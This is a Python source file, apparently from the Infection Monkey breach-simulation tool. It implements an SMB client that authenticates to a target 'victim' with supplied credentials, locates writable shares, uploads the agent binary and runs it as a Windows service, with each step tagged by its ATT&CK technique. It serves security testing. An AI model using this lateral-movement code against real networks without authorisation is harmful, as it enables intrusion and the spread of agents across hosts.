import logging
from pathlib import PurePath, PureWindowsPath
from typing import Callable, List, Set, Tuple, Type

from common import OperatingSystem
from common.agent_events import AgentEventTag
from common.credentials import Credentials
from common.tags import (
    BRUTE_FORCE_T1110_TAG,
    EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG,
    INGRESS_TOOL_TRANSFER_T1105_TAG,
    NETWORK_SHARE_DISCOVERY_T1135_TAG,
    REMOTE_SERVICES_T1021_TAG,
    SYSTEM_SERVICES_T1569_TAG,
)
from common.types import NetworkPort
from infection_monkey.exploit.tools import (
    IRemoteAccessClient,
    RemoteAuthenticationError,
    RemoteCommandExecutionError,
    RemoteFileCopyError,
)
from infection_monkey.i_puppet import TargetHost

from .smb_client import ShareInfo, SMBClient
from .smb_options import SMBOptions

logger = logging.getLogger(__name__)

SERVICE_NAME = "InfectionMonkey"
LOGIN_TAGS = {
    REMOTE_SERVICES_T1021_TAG,
    BRUTE_FORCE_T1110_TAG,
    EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG,
}
SHARE_DISCOVERY_TAGS = {
    NETWORK_SHARE_DISCOVERY_T1135_TAG,
}
COPY_FILE_TAGS = {
    INGRESS_TOOL_TRANSFER_T1105_TAG,
}
EXECUTION_TAGS = {
    REMOTE_SERVICES_T1021_TAG,
    EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG,
    SYSTEM_SERVICES_T1569_TAG,
}
SMB_PORTS = [NetworkPort(139), NetworkPort(445)]


class SMBRemoteAccessClient(IRemoteAccessClient):
    """Manages the SMB connection, Exploitation events"""

    def __init__(
        self,
        host: TargetHost,
        options: SMBOptions,
        command_builder: Callable[[PurePath], str],
        smb_client: SMBClient,
    ):
        self._host = host
        self._options = options
        self._command_builder = command_builder
        self._smb_client = smb_client

    def login(self, credentials: Credentials, tags: Set[AgentEventTag]):
        tags.update(LOGIN_TAGS)

        try:
            self._smb_client.connect_with_user(
                self._host, credentials, timeout=self._options.smb_connect_timeout
            )
        except Exception as err:
            error_message = f"Failed to authenticate over SMB with {credentials}: {err}"
            raise RemoteAuthenticationError(error_message)

    def _raise_if_not_authenticated(self, error_type: Type[Exception]):
        if not self._smb_client.connected():
            raise error_type(
                "This operation cannot be performed until authentication is successful"
            )

    def get_os(self) -> OperatingSystem:
        return OperatingSystem.WINDOWS

    def execute_agent(self, agent_binary_path: PurePath, tags: Set[AgentEventTag]):
        self._raise_if_not_authenticated(RemoteCommandExecutionError)

        try:
            tags.update(EXECUTION_TAGS)
            self._smb_client.run_service(
                SERVICE_NAME,
                self._command_builder(agent_binary_path),
                self._host,
                SMB_PORTS,
                self._options.smb_connect_timeout,
            )
        except Exception as err:
            raise RemoteCommandExecutionError(err)

    def copy_file(self, file: bytes, destination_path: PurePath, tags: Set[AgentEventTag]):
        self._raise_if_not_authenticated(RemoteFileCopyError)

        logger.debug(
            f"Trying to copy monkey file to [{destination_path}] on victim {self._host.ip}"
        )

        tags.update(SHARE_DISCOVERY_TAGS)
        target_shares = (s for s in self._query_shares() if s.path in destination_path.parents)
        for share in target_shares:
            clean_destination = destination_path.relative_to(share.path)
            logger.debug(f"Clean destination: {clean_destination}")

            try:
                self._copy_file_to_share(file, share, clean_destination, tags)
                return
            except Exception as err:
                error_message = (
                    f"Error uploading monkey to share '{share.name}' "
                    f"on victim {self._host.ip}: {err}"
                )
                logger.error(error_message)

        raise RemoteFileCopyError("No writable shares found")

    def _query_shares(self) -> Tuple[ShareInfo, ...]:
        writable_shares = []

        for share in self._smb_client.query_shared_resources():
            skip_message = f"Skipping share '{share.name}' on victim {self._host.ip} because"
            if share.current_uses >= share.max_uses:
                logger.debug(f"{skip_message} maximum uses is exceeded")
                continue

            if not share.path.drive:
                logger.debug(f"{skip_message} the share path is invalid")
                continue

            writable_shares.append(share)

        return tuple(writable_shares)

    def _copy_file_to_share(
        self, file: bytes, share: ShareInfo, destination_path: PurePath, tags: Set[AgentEventTag]
    ):
        self._connect_to_share(share)
        self._smb_client.set_timeout(self._options.agent_binary_upload_timeout)

        tags.update(COPY_FILE_TAGS)
        self._smb_client.send_file(share.name, PureWindowsPath(destination_path), file)

        logger.info(
            f"Copied monkey agent to remote share '{share.name}' "
            f"[{str(share.path)}] on victim {self._host.ip}"
        )

    def _connect_to_share(self, share: ShareInfo):
        """
        Gets the SMB share

        :param share: The share to connect to
        :raise Exception: If the share cannot be connected to
        """
        try:
            self._smb_client.connect_to_share(share.name)
        except Exception as err:
            logger.error(
                f'Error connecting tree to share "{str(share.path)}" '
                f"on victim {self._host.ip}: {err}"
            )
            raise RemoteFileCopyError(err)

    def get_writable_paths(self) -> List[PurePath]:
        logger.debug("Retrieving writable paths")
        return [info.path for info in self._query_shares()]
